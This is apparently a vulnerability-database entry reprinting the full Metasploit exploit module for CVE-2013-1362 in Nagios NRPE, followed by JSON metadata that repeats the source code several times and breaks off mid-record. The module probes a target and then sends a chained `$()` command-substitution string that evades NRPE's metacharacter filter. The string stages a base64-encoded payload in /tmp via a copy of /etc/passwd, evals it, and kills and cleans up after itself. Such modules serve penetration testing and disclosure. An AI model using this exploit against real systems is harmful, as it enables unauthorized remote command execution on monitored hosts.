ID MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
#
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
'Description' => %q{
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
Nagios server to actively poll information from the hosts it monitors. NRPE
has a configuration option dont_blame_nrpe which enables command-line arguments
to be provided remote plugins. When this option is enabled, even when NRPE makes
an effort to sanitize arguments to prevent command execution, it is possible to
execute arbitrary commands.
},
'Author' =>
[
'Rudolph Pereir', # Vulnerability discovery
'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1362' ],
[ 'OSVDB', '90582'],
[ 'BID', '58142'],
[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl python ruby telnet',
# *_perl, *_python and *_ruby work if they are installed
}
},
'Targets' =>
[
[ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 21 2013'
))
register_options(
[
Opt::RPORT(5666),
OptEnum.new('NRPECMD', [
true,
"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
'check_procs',
['check_procs', 'check_users', 'check_load', 'check_disk']
]),
# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
])
end
def send_message(message)
packet = [
2, # packet version
1, # packet type, 1 => query packet
0, # checksum, to be added later
0, # result code, discarded for query packet
message, # the command and arguments
0 # padding
]
packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum
begin
self.sock.put(packet.pack("nnNna1024n")) #send the packet
res = self.sock.get_once # get the response
rescue ::EOFError => eof
res = ""
end
return res.unpack("nnNnA1024n")[4] unless res.nil?
end
def setup
@ssl_socket = nil
@force_ssl = false
super
end
def exploit
if check != Exploit::CheckCode::Vulnerable
fail_with(Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
end
stage = "setsid nohup #{payload.encoded} & "
stage = Rex::Text.encode_base64(stage)
# NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
command = datastore['NRPECMD']
command << "!"
command << "$($(rm -f /tmp/$$)" # Delete the file if it exists
# need a way to write to a file without using redirection (>)
# cant count on perl being on all linux hosts, use GNU Sed
# TODO: Probably a better way to do this, some hosts may not have a /tmp
command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text
command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file
command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage
command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right?
command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes
command << "$(rm -f /tmp/$$))" # clean the file with the stage
connect
print_status("Sending request...")
send_message(command)
disconnect
end
def check
vprint_status("Checking if remote NRPE supports command line arguments")
begin
# send query asking to run "fake_check" command with command substitution in arguments
connect
res = send_message("__fake_check!$()")
# if nrpe is configured to support arguments and is not patched to add $() to
# NASTY_META_CHARS then the service will return:
# NRPE: Command '__fake_check' not defined
if res =~ /not defined/
return Exploit::CheckCode::Vulnerable
end
# Otherwise the service will close the connection if it is configured to disable arguments
rescue EOFError => eof
return Exploit::CheckCode::Safe
rescue Errno::ECONNRESET => reset
unless datastore['NRPESSL'] or @force_ssl
vprint_status("Retrying with ADH SSL")
@force_ssl = true
retry
end
return Exploit::CheckCode::Safe
rescue => e
return Exploit::CheckCode::Unknown
end
# TODO: patched version appears to go here
return Exploit::CheckCode::Unknown
end
# NRPE uses unauthenticated Anonymous-Diffie-Hellman
# setting the global SSL => true will break as we would be overlaying
# an SSLSocket on another SSLSocket which hasnt completed its handshake
def connect(global = true, opts={})
self.sock = super(global, opts)
if datastore['NRPESSL'] or @force_ssl
ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
ctx.ciphers = "ADH"
@ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)
@ssl_socket.connect
self.sock.extend(Rex::Socket::SslTcp)
self.sock.sslsock = @ssl_socket
self.sock.sslctx = ctx
end
return self.sock
end
def disconnect
@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl
super
end
end
{"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T02:02:52", "history": [{"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-02T23:44:48", "history": [], "viewCount": 8, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-02T23:44:48", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/linux/misc/nagios_nrpe_arguments", "reporter": "Rapid7", "references": ["#", "http://cvedetails.com/cve/cve-2013-1362", "http://www.securityfocus.com/bid/58142", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-07-24T19:45:55", "history": [], "viewCount": 10, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-07-24T19:45:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-08-21T15:30:09", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-08-21T15:30:09", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T01:17:44", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = 